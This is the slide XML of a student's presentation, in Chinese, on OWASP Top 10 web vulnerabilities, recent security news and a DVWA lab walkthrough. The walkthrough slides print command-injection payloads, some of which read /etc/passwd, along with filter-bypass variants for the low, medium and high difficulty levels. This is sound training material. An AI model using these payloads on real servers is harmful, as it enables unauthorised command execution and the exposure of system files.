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84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287" r:id="rId23"/>
    <p:sldId id="257" r:id="rId24"/>
    <p:sldId id="258" r:id="rId25"/>
    <p:sldId id="259" r:id="rId26"/>
    <p:sldId id="261" r:id="rId27"/>
    <p:sldId id="267" r:id="rId28"/>
    <p:sldId id="283" r:id="rId29"/>
    <p:sldId id="268" r:id="rId30"/>
    <p:sldId id="271" r:id="rId31"/>
    <p:sldId id="272" r:id="rId32"/>
    <p:sldId id="260" r:id="rId33"/>
    <p:sldId id="273" r:id="rId34"/>
    <p:sldId id="275" r:id="rId35"/>
    <p:sldId id="274" r:id="rId36"/>
    <p:sldId id="276" r:id="rId37"/>
    <p:sldId id="278" r:id="rId38"/>
    <p:sldId id="277" r:id="rId39"/>
    <p:sldId id="279" r:id="rId40"/>
    <p:sldId id="280" r:id="rId41"/>
    <p:sldId id="265" r:id="rId42"/>
    <p:sldId id="264" r:id="rId43"/>
    <p:sldId id="281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146E-9E43-46AB-8A3F-00954A727882}" type="datetimeFigureOut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CAF8C12-D29F-4B81-AC65-B2193BDB65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387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146E-9E43-46AB-8A3F-00954A727882}" type="datetimeFigureOut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CAF8C12-D29F-4B81-AC65-B2193BDB65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687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146E-9E43-46AB-8A3F-00954A727882}" type="datetimeFigureOut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CAF8C12-D29F-4B81-AC65-B2193BDB65E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0872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146E-9E43-46AB-8A3F-00954A727882}" type="datetimeFigureOut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CAF8C12-D29F-4B81-AC65-B2193BDB65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630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146E-9E43-46AB-8A3F-00954A727882}" type="datetimeFigureOut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CAF8C12-D29F-4B81-AC65-B2193BDB65E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7406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146E-9E43-46AB-8A3F-00954A727882}" type="datetimeFigureOut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CAF8C12-D29F-4B81-AC65-B2193BDB65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913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146E-9E43-46AB-8A3F-00954A727882}" type="datetimeFigureOut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8C12-D29F-4B81-AC65-B2193BDB65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9991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146E-9E43-46AB-8A3F-00954A727882}" type="datetimeFigureOut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8C12-D29F-4B81-AC65-B2193BDB65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566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146E-9E43-46AB-8A3F-00954A727882}" type="datetimeFigureOut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8C12-D29F-4B81-AC65-B2193BDB65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889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146E-9E43-46AB-8A3F-00954A727882}" type="datetimeFigureOut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CAF8C12-D29F-4B81-AC65-B2193BDB65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001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146E-9E43-46AB-8A3F-00954A727882}" type="datetimeFigureOut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CAF8C12-D29F-4B81-AC65-B2193BDB65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0038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146E-9E43-46AB-8A3F-00954A727882}" type="datetimeFigureOut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CAF8C12-D29F-4B81-AC65-B2193BDB65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7659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146E-9E43-46AB-8A3F-00954A727882}" type="datetimeFigureOut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8C12-D29F-4B81-AC65-B2193BDB65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617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146E-9E43-46AB-8A3F-00954A727882}" type="datetimeFigureOut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8C12-D29F-4B81-AC65-B2193BDB65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420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146E-9E43-46AB-8A3F-00954A727882}" type="datetimeFigureOut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8C12-D29F-4B81-AC65-B2193BDB65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359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146E-9E43-46AB-8A3F-00954A727882}" type="datetimeFigureOut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CAF8C12-D29F-4B81-AC65-B2193BDB65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827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6146E-9E43-46AB-8A3F-00954A727882}" type="datetimeFigureOut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CAF8C12-D29F-4B81-AC65-B2193BDB65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459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://www.ksu.edu.tw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eebuf.com/articles/web/123779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0F3CB5-1C6E-4AC9-9A96-5B3479EFB8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網站漏洞分析與實務</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>網站安全測試報告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1E03D84-6940-4418-8F37-FD65EB1327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學生</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>陳有言 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>4060e051</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指導老師</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>曾龍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4250602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1BFA8-2F1D-414D-BA43-7A0D42647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Cross-Site Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>XSS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>跨站腳本攻擊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A77C2E-08A1-4137-97A3-44268CEB5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當應用程式未將使用者提供的資料驗證或進行內容編碼，就將資料傳輸到網路瀏覽器，即可能發生。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>能讓攻擊者直接在受害者的網路瀏覽器上執行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，劫持使用者的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Sessions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>或竄改網站內容等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3081427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EB74D-FA45-4795-AA12-6FA2B2684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Insecure Deserialization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>不安全的反序列化漏洞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27D5D0-EE4A-4330-8D28-8C49B621E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該問題主要鎖定 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Node.js </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>等平臺攻擊，造成遠程代碼執行。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>即使反序列化缺陷不會導致遠程代碼執行，攻擊者也能利用它們執行重播攻擊、注入攻擊和特權升級攻擊等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3336133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437607-D662-4791-A2DD-4D416694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Using Components with  Known Vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>使用已知漏洞元件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7E2A90-33F0-4D74-B52B-692C21982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現行開發模式有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Dev Ops </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>及 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Agile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，為達到快速產出，開發人員通常會引用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Open Source Software (OSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，卻沒監控該 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>OSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的弱點問題，包括函式庫、框架及其他的軟體模組，而 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>OSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>卻會和應用程式以相同的權限執行。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>如果有一個容易受到攻擊的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>OSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>被駭客利用，就可能導致資料洩漏或伺服器被利用，且使用有漏洞的應用程式或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，都會破壞應用程式的防護，讓各種攻擊形式接踵而來。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>這也意味著，許多開發者在使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>OSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>模組或框架的習慣不好，除造成資料遺失外，也代表沒有即時升級或更新到最新版。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="781315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F32D3E-86EC-4E01-A5F1-9B35EB9F1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Insufﬁcient Logging &amp; Monitoring  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>記錄與監控不足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FD6C3B-2909-4AD5-8E40-6DC681A5D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當記錄與監控不足時，攻擊者能進一步攻擊系統、竄改資料、存取資料或刪除資料。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>而多數研究報告指出，當系統被攻擊後，受害系統要花超過 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>200 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>天以上才會發現資料外洩，且通常是透過第三方檢測工具發現，不是透過內部流程監控。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3706507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47556" y="2917768"/>
            <a:ext cx="391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網站資安威脅</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1571733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Zoom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>資安問題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39" y="2477886"/>
            <a:ext cx="8944495" cy="3695700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1C80601-571B-49A4-B854-915DCEF5064B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1463039" y="1822111"/>
            <a:ext cx="5382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https://www.ithome.com.tw/news/137055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1083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網站漏洞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535" y="2095500"/>
            <a:ext cx="9559636" cy="4122420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26C650A-145B-4365-ABB2-5034069F7B65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1263535" y="1535668"/>
            <a:ext cx="521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https://www.ithome.com.tw/news/137074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4267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網軍攻擊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47" y="2095499"/>
            <a:ext cx="9268691" cy="4222173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7F535D9-CE6E-4158-A9A1-78B90458FA73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1271847" y="1535668"/>
            <a:ext cx="541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https://www.ithome.com.tw/news/137187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3213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貨幣被盜走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18" y="2095500"/>
            <a:ext cx="8844742" cy="4554682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36AC2A7-18FD-4721-8A43-FC26D46D148B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1579418" y="1535668"/>
            <a:ext cx="530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https://www.ithome.com.tw/news/137106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2943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BGP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>劫持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786" y="2137063"/>
            <a:ext cx="9335192" cy="4255424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FB60CC5-3793-4E2D-AF3D-061FE4525F89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1296786" y="1535668"/>
            <a:ext cx="541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https://www.ithome.com.tw/news/136758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3948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OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>十大網路安全弱點</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>網站資安威脅</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>實戰</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1564288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微軟的資安漏洞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96" y="2095499"/>
            <a:ext cx="9326880" cy="4089169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DDCBA5D-35FD-4478-9109-4B26F4042E4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1695796" y="1535668"/>
            <a:ext cx="5210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https://www.ithome.com.tw/news/137136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8904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用戶憑證被偷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91" y="2095500"/>
            <a:ext cx="9160625" cy="4072544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A14B528-D8C1-49C4-AA63-E9B3A644239C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496291" y="1535668"/>
            <a:ext cx="525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https://www.ithome.com.tw/news/136946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92813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37362" y="3051425"/>
            <a:ext cx="2616230" cy="1280890"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>實戰</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3652422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71312-B776-486A-A2D5-4E45B2232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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>command injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>127.0.0.1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B5C671F-687E-442A-978F-25D0E9DC2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133600"/>
            <a:ext cx="8911687" cy="4318958"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56573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4DC780-4616-450B-86D4-149F06A0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漏洞測試 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>command injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>127.0.0.1; cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/passwd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5A8B731-DBD0-4F59-99E0-39D632896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309" y="2159479"/>
            <a:ext cx="8911687" cy="4172310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C98FF10-D0A6-435C-B054-C11DA8048755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7531488" y="46465"/>
            <a:ext cx="431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直接在要執行的命令前面加上”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>;” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>即可在對方的伺服器上執行命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4105097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B72C43-924F-4487-B496-98F69127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漏洞測試 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>command injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.ksu.edu.tw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>; cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/passwd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A1F662B-5A8A-4CC3-A576-593518799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133600"/>
            <a:ext cx="8911687" cy="4100290"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4255824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D0B98D-E3AA-421F-B40B-3F1EB828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fr-FR" dirty="0"/>
              <a:t>漏洞測試 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>command injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" dirty="0"/>
              <a:t>www.google.com; cat /etc/passwd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BB35DAD-9997-4449-8126-B77ED9270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133600"/>
            <a:ext cx="8911687" cy="4100290"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1163446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9485E1-EDDA-465C-8223-66AFC5160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127.0.0.1;ls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>command injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>等級</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>low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8211B2B-365E-4997-9CDB-C7A0DF92F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133599"/>
            <a:ext cx="8911687" cy="4198189"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3882892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A6E155-AB8F-4700-B3EA-43E1A7200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006282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直接看代碼，它把’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>&amp;&amp;’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>和’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>;’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>都變成了空白</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>過濾掉了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80B0BD-2B7D-453E-9928-AE6C09C6B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133600"/>
            <a:ext cx="8911687" cy="4249948"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2381322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6C9A4-FB2D-4233-BF31-3679F7A31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127.0.0.1&amp;;&amp;ls</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>等級</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>medium   command injection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9056108-34FA-4BC3-AD89-FCF7B2C3E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133599"/>
            <a:ext cx="8911687" cy="4198189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EF5F882-EBEE-45BE-A81B-7FCB6C0F8F97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7504981" y="72345"/>
            <a:ext cx="449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可以使用 ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>127.0.0.1&amp;;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ls’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>去繞過 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>被過濾掉之後等於剩下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>127.0.0.1;ls)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5792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AF4-08EC-44EC-AE5E-D855A84BF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915" y="3044472"/>
            <a:ext cx="5602170" cy="76905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OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>十大網路安全弱點</a:t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9281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FD28BB-55D7-45DA-B1B6-5E1356B72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127.0.0.1&amp;ls</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>等級</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>medium   command injection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10F3EFE-138F-4C8F-B549-D52FBB7EB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133599"/>
            <a:ext cx="8911687" cy="4241321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5207A77-8A9B-4CBF-B3EB-09AD15538DAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8151963" y="72345"/>
            <a:ext cx="3812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因為被過濾的只有”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>&amp;&amp;”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>與”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>;”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>，所以”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>&amp;”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>不會受影響。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9537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184C92-AC72-4A01-B005-99239A417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2800" dirty="0"/>
              <a:t>127.0.0.1 |ls(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>可以把空白字串在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的左邊來進行繞過注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>等級</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>high   command injection</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2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7E07CE6-8212-40C4-81B0-EC4B95D18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2133599"/>
            <a:ext cx="8911687" cy="3991155"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
